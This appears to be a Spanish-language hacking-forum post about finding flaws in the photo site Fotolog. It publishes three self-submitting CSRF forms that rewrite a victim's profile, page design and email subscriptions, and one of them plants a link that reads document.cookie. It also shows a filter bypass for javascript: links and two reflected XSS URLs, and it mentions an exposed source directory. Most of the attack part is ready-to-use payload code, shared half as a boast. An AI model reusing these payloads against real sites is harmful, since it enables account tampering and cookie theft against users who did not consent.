empiezo, taba en la casa de fede y me mostro un csrf para borrar comentarios de las fotos, bueno, pasa que este es re conocido :p y dijimos, bueno, ya encontramos 2 xss y un "ftp" de la api de fotolog(aunque no lo sepan, el genio de fede en el dominio http://si.fotolog.com/i94/ encontro que estaban habilitados los indexes de apache yse podia navegar por los codigos fuentes de fotolog xD! testigos: WHK y SDC) y los xss uno lo encontro fede hace banda en el "redirect=" del cambio de idioma y yo hace poco (solo funciona en IE) otro medio raro, pero no taban tan piolas, la cosa era encontrar mas, mejor cantidad y menos calidad. nos pusimos a ver el perfil y a modificarlo, nos dimos cuenta que no pedia contraseña como en otros casos, vimos el codigo fuente del formulario y tampoco tenia token.
Wow! copiamos el formulario y empezamos a depurar, ni bien empezamos nos tubimos que ir (para mi casa xD!) y aca (en mi casa ) despues de boludear y boludear, encontramos otro csrf, pero no depuramos nada ni tampoco usamos el otro fichero, el de la casa de fede.
entonces hoy agarro y digo (ya solito en mi casa y fede en la suya) postiemos los 2 CSRF en elhacker.net asi [ego]ven que tanto inteligentes somos![/ego] y cunado me pongo a buscar los formularios, a depurar (que llevo su tiempo la verdad!!) y todo eso, me propongo buscar mas csrf, y encontre uno mas, boludiando por el perfil tambien me di cuenta que baypaseando se puede agregar un link a: "javascript:alert(1)" y por ultimo encontre otro xss. al ver esto decimos, en que garcha subimos nuestras fotos?, y si, es una garcha. jajaj. ahora voy a poner los formularios de los CSRF seguido de como baypasear y despues donde esta el xss.
Guarda con los formularios porq se mandan solos automaticamente se abren...
1er formulario: (este modifica los datos personales...)
Código
<body onload="document.update_prefs.submit()"> <form id="settings" action="http://account.fotolog.com/profile" name="update_prefs" method="post" enctype="multipart/form-data"> <input type="hidden" class="checkbox" id="display_bio" name="display_bio" checked value="true"> <input type="hidden" id="bio_statement" name="bio_statement" wrap="virtual" value="Te cabieron el pote!"> <input type="hidden" class="checkbox" id="display_image" name="display_image" checked value="false"> <input type="hidden" id="image" name="image" class="lg"> <input type="hidden" id="firstname" name="firstname" class="lg" value="Me ponwearon" maxlength="32"> <input type="hidden" id="lastname" name="lastname" class="lg" value="Fede_cp y Castg" maxlength="32"> <input type="hidden" class="radio" name="gender" id="g_0" value="0"> <input type="hidden" class="radio" name="gender" id="g_1" value="1"> <input type="hidden" class="radio" name="gender" id="g_2" value="2"> <input type="hidden" id="profession" name="profession" class="lg" value="Ser powneado :'(" maxlength="40"> <input type="hidden" class="med" name="new:plink:0:name" value="Castg! y Fede_cp son los ***** amos!" maxlength="64"> <input type="hidden" class="med" name="new:plink:0:url" value="http://google.com" maxlength="64"> <input type="hidden" class="med" name="new:plink:1:name" value="xss no, terrible pelotudes see!!!" maxlength="64"> <input type="hidden" class="med" name="new:plink:1:url" value="javasjavascript:cript:alert(document.cookie)" maxlength="64"> <input type="hidden" class="checkbox" name="delete:new:plink:0"> <input type="hidden" class="checkbox" name="delete:new:plink:1"> <input type="hidden" name="new:plink:1" value="1"> <input type="hidden" id="country" name="country" value="_N"> <input type="hidden" id="state" name="state" value="00"> <input type="hidden" name="city" id="city" maxlength="128" class="med" value="El ciber mundo!"> <input type="hidden" name="language" value="tr"> <input type="hidden" name="new:camera:0:type" value="3"> <input type="hidden" id="fotolog_description" name="fotolog_description" wrap="virtual" value=":P"> <input type="hidden" name="new:camera:0:brand" value="Logitech" class="sm" maxlength="32"> <input type="hidden" name="new:camera:0:model" value="¿?" class="sm" maxlength="32"> <input type="hidden" type="checkbox" name="delete:new:camera:0"> <input type="hidden" name="new:camera:0" value="1"> <input type="hidden" id="music" name="music" wrap="virtual" class="med" value="Reggae con un fasito!"> <input type="hidden" id="movies" name="movies" wrap="virtual" value="Garganta Profunda (busquen en el puto google ¬¬)"> <input type="hidden" id="sports" name="sports" wrap="virtual" value="Lucha en el barro!"> <input type="hidden" class="med" name="new:favlink:0:name" value="I'm cagado!" maxlength="64"> <input type="hidden" class="med" name="new:favlink:0:url" value="http://google.com" maxlength="64"> <input type="hidden" class="checkbox" name="delete:new:favlink:0"> <input type="hidden" name="new:favlink:0" value="1"> </form> </body>
2do formulario: (este modifica los colores y titulo...)
Código
<body onload="document.update_prefs.submit()"> <form name="update_prefs" action="http://account.fotolog.com/page_design" id="settings" method="post" enctype="multipart/form-data"> <input type="hidden" name="title" value="Me cabieron el pote!"> <input type="hidden" name="margin_txt_color" value="FFFFFF"> <input type="hidden" name="margin_link_color" value="33FF00"> <input type="hidden" name="margin_bg_color" value="FFFF00"> <input type="hidden" name="text_color" value="FFFFFF"> <input type="hidden" name="hyperlink_text_color" value="FFFF00"> <input type="hidden" name="background_color" value="FFFF00"> </form> </body>
3er formulario: (noticias por mail... "newlestter")
Código
<body onload="document.update_prefs.submit()"> <form name="update_prefs" method="post" enctype="multipart/form-data" id="settings"> <input type="hidden" name="receive_email_digest" value="true"> <input type="hidden" name="receive_updates" value="true"> <input type="hidden" name="receive_newsletter" value="true"> <input type="hidden" name="receive_promotionals" value="true"> </form> </body>
la verdad son re boludos, pero quiera uno o no! jajaj
Bypass en URL: (el bypass lo descubrio favaloro, un medico argentino)
bueno, en http://account.fotolog.com/profile en la parte de enlaces personales ponen el nombre q se les cante, si son floggers ponegan "mail de cumbio" y pican al toq xD!, y en url si ponen javascript:alert(1); se los transforma en http://alert(1)/; entonces si ponemos javasjavascript:cript:alert(1); borra el javascript armado, uniendo los separados . entonces cuando ponen click en el "link" saltara un alert con el mesaje "1".
XSS: (aca no tengo nada para poner :p)
muy simple,
aca uno: (salta 5 veces) http://txn.fotolog.com/gift_store?u=%22%3E%3Cscript%3Ealert%28%27xss%20by%20castg%27%29;%3C/script%3E
aca otro parecido pero nomas que saltan 7 :P : http://txn.fotolog.com/gift_store?id=712&u=%22%3E%3Cscript%3Ealert(%27xss%20by%20castg%27);%3C/script%3E
bueno, este fue un capitulo de fede_castg, espero que les haya gustado y... chau. jajaj
Aviso que mande dos mails al webmaster, ahora q se jodan xD!